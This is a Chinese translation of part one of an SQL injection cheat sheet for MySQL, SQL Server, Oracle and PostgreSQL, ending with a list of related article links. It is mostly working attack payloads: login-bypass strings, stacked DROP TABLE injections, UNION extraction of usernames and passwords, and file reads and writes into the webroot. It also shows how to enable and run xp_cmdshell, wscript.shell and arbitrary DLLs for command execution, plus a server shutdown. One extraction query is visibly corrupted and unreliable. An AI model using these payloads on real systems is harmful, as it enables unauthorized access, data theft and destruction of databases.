SQL隱碼攻擊速查表(上)
0x00 關於SQL隱碼攻擊速查表
現在僅支援MySQL、Microsoft SQL Server,以及一部分ORACLE和PostgreSQL。大部分樣例都不能保證每一個場景都適用。現實場景由於各種插入語、不同的程式碼環境以及各種不常見甚至奇特的SQL語句,而經常發生變化。
樣例僅用於讀者理解對於“可能出現的攻擊(a potential attack)”的基礎概念,並且幾乎每一個部分都有一段簡潔的概要
- M: MySQL
- S: SQL Server
- P: PostgreSQL
- O: Oracle
- +: (大概)其他所有資料庫
例子:
- (MS) 代表 : MySQL 和 SQL Server 等
- (M*S) 代表 : 僅對某些版本或者某些附在後文中的特殊情況的 MySQL,以及SQL Server
0x01 目錄
- 關於SQL隱碼攻擊速查表
- 語法參考,攻擊樣例以及注入小技巧
- 行間註釋
- 使用了行間註釋的SQL隱碼攻擊樣例
- 行內註釋
- 使用了行內註釋的注入攻擊樣例
- MySQL版本探測攻擊樣例
- 堆疊查詢(Stacking Queries)
- 支援堆疊查詢的語言/資料庫
- 關於MySQL和PHP
- 堆疊注入攻擊樣例
- If語句
- MySQL的If語句
- SQL Server的If語句
- 使用了If語句的注入攻擊樣例
- 整數(Integers)的使用
- 字串操作
- 字串的串聯
- 沒有引號的字串
- 使用了16進位制的注入攻擊樣例
- 字串異化(Modification)與聯絡
- Union注入
- UNION-語言問題處理
- 繞過登陸介面(SMO+)
- 繞過檢查MD5雜湊的登陸介面
- 繞過MD5雜湊檢查的例子(MSP)
- 基於錯誤(Error Based)-探測欄位名
- 使用
HAVING
來探測欄位名(S) - 在
SELECT
查詢中使用ORDER BY
探測欄位數(MSO+)
- 使用
- 資料型別、UNION、之類的
- 獲取欄位型別
- 簡單的注入(MSO+)
- 有用的函式、資訊收集、內建程式、大量注入筆記
@@version
(MS)- 檔案插入(Bulk Insert)(S)
- BCP(S)
- SQL Server的VBS/WSH(S)
- 執行系統命令,xp_cmdshell(S)
- SQL Server中的一些特殊的表(S)
- SQL Server的其它內建程式(S)
- 大量MSSQL筆記
- 使用LIMIT(M)或ORDER(MSO)的注入
- 關掉SQL Server(S)
- 在SQL Server 2005中啟用xp_cmdshell
- 探測SQL Server資料庫的結構(S)
- 獲取使用者定義表
- 獲取欄位名
- 移動記錄(Moving records)(S)
- 快速的脫掉基於錯誤(Error Based)的SQL Server注入(S)
- 行間註釋
0x02 語法參考,攻擊樣例以及注入小技巧
行間註釋
註釋掉查詢語句的其餘部分
行間註釋通常用於註釋掉查詢語句的其餘部分,這樣你就不需要去修復整句語法了。
--
(SM)DROP sampletable;--
#
(M)DROP sampletable;#
使用了行間註釋的SQL隱碼攻擊樣例
使用者名稱:
admin'--
- 構成語句:
SELECT * FROM members WHERE username = 'admin'--' AND password = 'password'
這會使你以admin身份登陸,因為其餘部分的SQL語句被註釋掉了。
行內註釋
透過不關閉註釋註釋掉查詢語句的其餘部分,或者用於繞過過濾,移除空格,混淆,或探測資料庫版本。
/*註釋內容*/
(SM)DROP/*comment*/sampletable
DR/**/OP/*繞過過濾*/sampletable
SELECT/*替換空格*/password/**/FROM/**/Members
/*! MYSQL專屬 */
(M)這是個MySQL專屬語法。非常適合用於探測MySQL版本。如果你在註釋中寫入程式碼,只有MySQL才會執行。同樣的你也可以用這招,使得只有高於某版本的伺服器才執行某些程式碼。
SELECT /*!32302 1/0, */ 1 FROM tablename
使用了行內註釋的注入攻擊樣例
ID:
10; DROP TABLE members /*
簡單地擺脫了處理後續語句的麻煩,同樣你可以使用10; DROP TABLE members --
MySQL版本探測攻擊樣例
SELECT /*!32302 1/0, */ 1 FROM tablename
如果MySQL的版本高於3.23.02,會丟擲一個division by 0 error
ID:
/*!32302 10*/
ID:
10
如果MySQL版本高於3.23.02,以上兩次查詢你將得到相同的結果
堆疊查詢(Stacking Queries)
一句程式碼之中執行多個查詢語句,這在每一個注入點都非常有用,尤其是使用SQL Server後端的應用
;
(S)SELECT * FROM members; DROP members--
結束一個查詢並開始一個新的查詢
支援堆疊查詢的語言/資料庫
綠色:支援,暗灰色:不支援,淺灰色:未知
關於MySQL和PHP
闡明一些問題。
PHP-MySQL不支援堆疊查詢,Java不支援堆疊查詢(ORACLE的我很清楚,其他的就不確定了)。一般來說MySQL支援堆疊查詢,但由於大多數PHP-Mysql應用框架的資料庫層都不能執行第二條查詢,或許MySQL的客戶端支援這個,我不確定,有人能確認一下嗎?
(譯者注:MySQL 5.6.20版本下客戶端支援堆疊查詢)
堆疊注入攻擊樣例
ID:
10;DROP members --
構成語句:SELECT * FROM products WHERE id = 10; DROP members--
這在執行完正常查詢之後將會執行DROP查詢。
If語句
根據If語句得到響應。這是盲注(Blind SQL Injection)的關鍵之一,同樣也能簡單而準確地進行一些測試。
MySQL的If語句
IF(condition,true-part,false-part)
(M)SELECT IF (1=1,'true','false')
SQL Server的If語句
IF condition true-part ELSE false-part
(S)IF (1=1) SELECT 'true' ELSE SELECT 'false'
使用了If語句的注入攻擊樣例
if ((select user) = 'sa' OR (select user) = 'dbo') select 1 else select 1/0
(S)
如果當前使用者不是"sa"或者"dbo",就會丟擲一個divide by zero error
。
整數(Integers)的使用
對於繞過十分有用,比如magic_quotes() 和其他類似過濾器,甚至是各種WAF。
0xHEXNUMBER
(SM)(HEXNUMBER:16進位制數) 你能這樣使用16進位制數:
SELECT CHAR(0x66)
(S)SELECT 0x5045
(M) (這不是一個整數,而會是一個16進位制字串)SELECT 0x50 + 0x45
(M) (現在這是整數了)
字串操作
與字串相關的操作。這對於構造一個不含有引號,用於繞過或探測資料庫都非常的有用。
字串的串聯
+
(S)SELECT login + '-' + password FROM members
||
(*MO)SELECT login || '-' || password FROM members
*關於MySQL的"||" 這個僅在ANSI模式下的MySQL執行,其他情況下都會當成'邏輯運算子'並返回一個0。更好的做法是使用CONCAT()
函式。
CONCAT(str1, str2, str3, ...)
(M)連線引數裡的所有字串 例:
SELECT CONCAT(login, password) FROM members
沒有引號的字串
有很多使用字串的方法,但是這幾個方法是一直可用的。使用CHAR()
(MS)和CONCAT()
(M)來生成沒有引號的字串
0x457578
(M) - 16進位制編碼的字串SELECT 0x457578
這在MySQL中會被當做字串處理
在MySQL中使用16進位制字串的一個簡單方式:
SELECT CONCAT('0x',HEX('c:\\boot.ini'))
在MySQL中使用
CONCAT()
函式:SELECT CONCAT(CHAR(75),CHAR(76),CHAR(77))
(M)這會返回'KLM'
SELECT CHAR(75)+CHAR(76)+CHAR(77)
(S)這會返回'KLM'
使用了16進位制的注入攻擊樣例
SELECT LOAD_FILE(0x633A5C626F6F742E696E69)
(M)這會顯示c:\boot.ini的內容
字串異化(Modification)與聯絡
ASCII()
(SMP)返回最左邊字元的ASCII碼的值。這是一個用於盲注的重要函式。
例:
SELECT ASCII('a')
CHAR()
(SM)把整數轉換為對應ASCII碼的字元
例:
SELECT CHAR(64)
Union注入
透過union你能跨表執行查詢。最簡單的,你能注入一個查詢使得它返回另一個表的內容。 SELECT header, txt FROM news UNION ALL SELECT name, pass FROM members
這會把news表和members表的內容合併返回。
另一個例子: ' UNION SELECT 1, 'anotheruser', 'doesnt matter', 1--
UNION-語言問題處理
當你使用Union來注入的時候,經常會遇到一些錯誤,這是由於不同的語言的設定(表的設定、欄位設定、表或資料庫的設定等等)。這些辦法對於解決那些問題都挺有用的,尤其是當你處理日文,俄文,土耳其文的時候你會就會見到他們的。
使用
COLLATE SQL_Latin1_General_Cp1254_CS_AS
(S)或者其它的什麼語句,具體的自己去查SQL Server的文件。 例:
SELECT header FROM news UNION ALL SELECT name COLLATE SQL_Latin1_General_Cp1254_CS_AS FROM members
Hex()
(M)百試百靈~
繞過登陸介面(SMO+)
SQL隱碼攻擊101式(大概是原文名字吧?),登陸小技巧
admin' --
admin' #
admin'/*
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1--
- ....
- 以不同的使用者登陸 (SM*)
' UNION SELECT 1, 'anotheruser', 'doesnt matter', 1--
**舊版本的MySQL不支援union*
繞過檢查MD5雜湊的登陸介面
如果應用是先透過使用者名稱,讀取密碼的MD5,然後和你提供的密碼的MD5進行比較,那麼你就需要一些額外的技巧才能繞過驗證。你可以把一個已知明文的MD5雜湊和它的明文一起提交,使得程式不使用從資料庫中讀取的雜湊,而使用你提供的雜湊進行比較。
繞過MD5雜湊檢查的例子(MSP)
使用者名稱:
admin
密碼:
1234 ' AND 1=0 UNION ALL SELECT 'admin','81dc9bdb52d04dc20036dbd8313ed055
其中81dc9bdb52d04dc20036dbd8313ed055 = MD5(1234)
基於錯誤(Error Based)-探測欄位名
使用HAVING
來探測欄位名(S)
' HAVING 1=1 --
' GROUP BY table.columnfromerror1 HAVING 1=1 --
' GROUP BY table.columnfromerror1, columnfromerror2 HAVING 1=1 --
- ……
' GROUP BY table.columnfromerror1, columnfromerror2,columnfromerror(n) HAVING 1=1 --
- 直到它不再報錯,就算搞定了
在SELECT
查詢中使用ORDER BY
探測欄位數(MSO+)
透過ORDER BY來探測欄位數能夠加快union注入的速度。
ORDER BY 1--
ORDER BY 2--
- ……
ORDER BY N--
- 一直到它報錯為止,最後一個成功的數字就是欄位數。
資料型別、UNION、之類的
提示:
- 經常給UNION配上ALL使用,因為經常會有相同數值的欄位,而預設情況下UNION都會嘗試返回唯一值(records with distinct)
- 如果你每次查詢只能有一條記錄,而你不想讓原本正常查詢的記錄佔用這寶貴的記錄位,你可以使用
-1
或者根本不存在的值來搞定原查詢(前提是注入點在WHERE裡)。 - 在UNION中使用NULL,對於大部分資料型別來說這樣都比瞎猜字串、日期、數字之類的來得強
- 盲注的時候要小心判斷錯誤是來自應用的還是來自資料庫的。因為像ASP.NET就經常會在你使用NULL的時候丟擲錯誤(因為開發者們一般都沒想到使用者名稱的框中會出現NULL)
獲取欄位型別
' union select sum(columntofind) from users--
(S)Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average aggregate operation cannot take a **varchar** data type as an argument.
如果沒有返回錯誤說明欄位是數字型別同樣的,你可以使用
CAST()
和CONVERT()
SELECT * FROM Table1 WHERE id = -1 UNION ALL SELECT null, null, NULL, NULL, convert(image,1), null, null,NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULl, NULL--
11223344) UNION SELECT NULL,NULL,NULL,NULL WHERE 1=2 –-
沒報錯 - 語法是正確的。 這是MS SQL Server的語法。 繼續。
11223344) UNION SELECT 1,NULL,NULL,NULL WHERE 1=2 –-
沒報錯 – 第一個欄位是
integer
型別。11223344) UNION SELECT 1,2,NULL,NULL WHERE 1=2 --
報錯 – 第二個欄位不是
integer
型別11223344) UNION SELECT 1,’2’,NULL,NULL WHERE 1=2 –-
沒報錯 – 第二個欄位是
string
型別。11223344) UNION SELECT 1,’2’,3,NULL WHERE 1=2 –-
報錯 – 第三個欄位不是
integer
……
Microsoft OLE DB Provider for SQL Server error '80040e07' Explicit conversion from data type int to image is not allowed.
你在遇到union錯誤之前會先遇到convert()錯誤,所以先使用convert()再用union
簡單的注入(MSO+)
'; insert into users values( 1, 'hax0r', 'coolpass', 9 )/*
有用的函式、資訊收集、內建程式、大量注入筆記
@@version
(MS)
資料庫的版本。這是個常量,你能把它當做欄位來SELECT,而且不需要提供表名。同樣的你也可以用在INSERT/UPDATE語句裡面,甚至是函式里面。
INSERT INTO members(id, user, pass) VALUES(1, ''+SUBSTRING(@@version,1,10) ,10)
檔案插入(Bulk Insert)(S)
把檔案內容插入到表中。如果你不知道應用目錄你可以去讀取IIS metabase file(僅IIS 6)(%systemroot%\system32\inetsrv\MetaBase.xml)然後在裡面找到應用目錄。
- 新建一個表foo(
line varchar(8000)
) BULK INSERT foo FROM 'c:\inetpub\wwwroot\login.asp'
- DROP了臨時表,重複另一個檔案
BCP(S)
寫入檔案。這個功能需要登入 bcp "SELECT * FROM test..foo" queryout c:\inetpub\wwwroot\runcommand.asp -c -Slocalhost -Usa -Pfoobar
SQL Server的VBS/WSH(S)
由於ActiveX的支援,你能在SQL Server中使用VBS/WSH
declare @o int
exec sp_oacreate 'wscript.shell', @o out
exec sp_oamethod @o, 'run', NULL, 'notepad.exe'
Username:
'; declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL, 'notepad.exe' --
執行系統命令,xp_cmdshell(S)
眾所周知的技巧,SQL Server 2005預設是關閉的。你需要admin許可權
EXEC master.dbo.xp_cmdshell 'cmd.exe dir c:'
用ping簡單的測試一下,用之前先檢查一下防火牆和嗅探器。
EXEC master.dbo.xp_cmdshell 'ping '
如果有錯誤,或者union或者其他的什麼,你都不能直接讀到結果。
SQL Server中的一些特殊的表(S)
Error Messages
master..sysmessages
Linked Servers
master..sysservers
Password (2000和2005版本的都能被破解,這倆的加密演算法很相似)
SQL Server 2000: masters..sysxlogins
SQL Server 2005 : sys.sql_logins
SQL Server的其它內建程式(S)
命令執行 (xp_cmdshell)
exec master..xp_cmdshell 'dir'
登錄檔操作 (xp_regread)
- xp_regaddmultistring
- xp_regdeletekey
- xp_regdeletevalue
- xp_regenumkeys
- xp_regenumvalues
- xp_regread
- xp_regremovemultistring
xp_regwrite
exec xp_regread HKEY_LOCAL_MACHINE, 'SYSTEM\CurrentControlSet \Services\lanmanserver\parameters', 'nullsessionshares' exec xp_regenumvalues HKEY_LOCAL_MACHINE, 'SYSTEM \CurrentControlSet \Services\snmp\parameters\validcommunities'
管理服務(xp_servicecontrol)
媒體(xp_availablemedia)
ODBC 資源 (xp_enumdsn)
- 登入 (xp_loginconfig)
- 建立Cab檔案 (xp_makecab)
- 域名列舉 (xp_ntsec_enumdomains)
- 殺程式 (need PID) (xp_terminate_process)
新建程式 (實際上你想幹嘛都行)
sp_addextendedproc ‘xp_webserver’, ‘c:\temp\x.dll’ exec xp_webserver
寫檔案進UNC或者內部路徑 (sp_makewebtask)
大量MSSQL筆記
SELECT * FROM master..sysprocesses /*WHERE spid=@@SPID*/
DECLARE @result int; EXEC @result = xp_cmdshell 'dir *.exe';IF (@result = 0) SELECT 0 ELSE SELECT 1/0
HOST_NAME() IS_MEMBER (Transact-SQL)
IS_SRVROLEMEMBER (Transact-SQL)
OPENDATASOURCE (Transact-SQL)
INSERT tbl EXEC master..xp_cmdshell OSQL /Q"DBCC SHOWCONTIG"
OPENROWSET (Transact-SQL) - http://msdn2.microsoft.com/en-us/library/ms190312.aspx
你不能在 SQL Server 的Insert查詢裡使用子查詢(sub select).
使用LIMIT(M)或ORDER(MSO)的注入
SELECT id, product FROM test.test t LIMIT 0,0 UNION ALL SELECT 1,'x'/*,10 ;
如果注入點在LIMIT的第二個引數處,你可以把它註釋掉或者使用union注入。
關掉SQL Server(S)
如果你真的急了眼,';shutdown --
在SQL Server 2005中啟用xp_cmdshell
預設情況下,SQL Server 2005中像xp_cmdshell以及其它危險的內建程式都是被禁用的。如果你有admin許可權,你就可以啟動它們。
`\
EXEC sp_configure 'show advanced options',1 RECONFIGURE
EXEC sp_configure 'xp_cmdshell',1 RECONFIGURE `\
探測SQL Server資料庫的結構(S)
獲取使用者定義表
SELECT name FROM sysobjects WHERE xtype = 'U'
獲取欄位名
SELECT name FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = 'tablenameforcolumnnames')
移動記錄(Moving records)(S)
修改WHERE,使用NOT IN或者NOT EXIST
... WHERE users NOT IN ('First User', 'Second User')
SELECT TOP 1 name FROM members WHERE NOT EXIST(SELECT TOP 0 name FROM members)
-- 這個好用髒的不行的小技巧
SELECT * FROM Product WHERE ID=2 AND 1=CAST((Select p.name from (SELECT (SELECT COUNT(i.id) AS rid FROM sysobjects i WHERE i.id<=o.id) AS x, name from sysobjects o) as p where p.x=3) as int
Select p.name from (SELECT (SELECT COUNT(i.id) AS rid FROM sysobjects i WHERE xtype='U' and i.id<=o.id) AS x, name from sysobjects o WHERE o.xtype = 'U') as p where p.x=21
快速的脫掉基於錯誤(Error Based)的SQL Server注入(S)
';BEGIN DECLARE @rt varchar(8000) SET @rd=':' SELECT @[email protected]+' '+name FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = 'MEMBERS') AND name>@rd SELECT @rd AS rd into TMP_SYS_TMP end;--
詳情請參考:Fast way to extract data from Error Based SQL Injections
相關文章
- SQL隱碼攻擊速查表(下)與Oracle注入速查表2020-08-19SQLOracle
- SQL隱碼攻擊2024-07-02SQL
- SQL隱碼攻擊(pikachu)2024-05-10SQL
- SQL隱碼攻擊方法2024-07-08SQL
- MYSQL SQL隱碼攻擊2021-11-20MySql
- SQL隱碼攻擊原理是什麼?如何防範SQL隱碼攻擊?2022-11-24SQL
- SQL隱碼攻擊導圖2018-06-15SQL
- SQL隱碼攻擊語句2018-07-25SQL
- pikachu-SQL隱碼攻擊2020-11-21SQL
- SQL隱碼攻擊總結2024-08-31SQL
- XSS與SQL隱碼攻擊2020-12-25SQL
- DVWA-SQL Injection(SQL隱碼攻擊)2023-03-18SQL
- 【網路安全】什麼是SQL隱碼攻擊漏洞?SQL隱碼攻擊的特點!2021-09-06SQL
- 攻擊JavaWeb應用[4]-SQL隱碼攻擊[2]2020-08-19JavaWebSQL
- 攻擊JavaWeb應用[3]-SQL隱碼攻擊[1]2020-08-19JavaWebSQL
- SQL隱碼攻擊關聯分析2020-08-19SQL
- Mybatis如何防止SQL隱碼攻擊2020-09-23MyBatisSQL
- Nacos Derby SQL隱碼攻擊漏洞2024-06-27SQL
- MSSQL SQL隱碼攻擊 總結2021-11-08SQL
- Oracle SQL隱碼攻擊 總結2021-11-09OracleSQL
- SQL隱碼攻擊-堆疊注入2021-07-04SQL
- SQL隱碼攻擊基礎原理2020-12-10SQL
- 【網路安全入門】SQL隱碼攻擊是什麼?SQL隱碼攻擊危害有哪些?2021-11-05SQL
- 什麼是SQL隱碼攻擊(SQLi)2018-11-29SQL
- SQL隱碼攻擊讀寫檔案2018-07-27SQL
- Mura CMS processAsyncObject SQL隱碼攻擊漏洞2024-05-14ObjectSQL
- 預防SQL隱碼攻擊筆記2019-06-18SQL筆記
- SQL隱碼攻擊——時間盲注2024-08-03SQL
- SQL隱碼攻擊基礎入門2024-07-08SQL
- 前端如何預防SQL隱碼攻擊?2024-11-28前端SQL
- SQL隱碼攻擊:Sqlmap初體驗2021-05-14SQL
- SQL隱碼攻擊及如何解決2020-12-30SQL
- WEB三大攻擊之—SQL隱碼攻擊與防護2019-01-28WebSQL
- SQL隱碼攻擊原理——萬能密碼注入2018-08-06SQL密碼
- SQL隱碼攻擊原理及程式碼分析(二)2020-07-09SQL
- SQL隱碼攻擊原理及程式碼分析(一)2020-07-04SQL
- SQL隱碼攻擊預備知識-sql基礎2021-09-09SQL
- SQL隱碼攻擊 - 手工注入sqli-labs2024-03-05SQL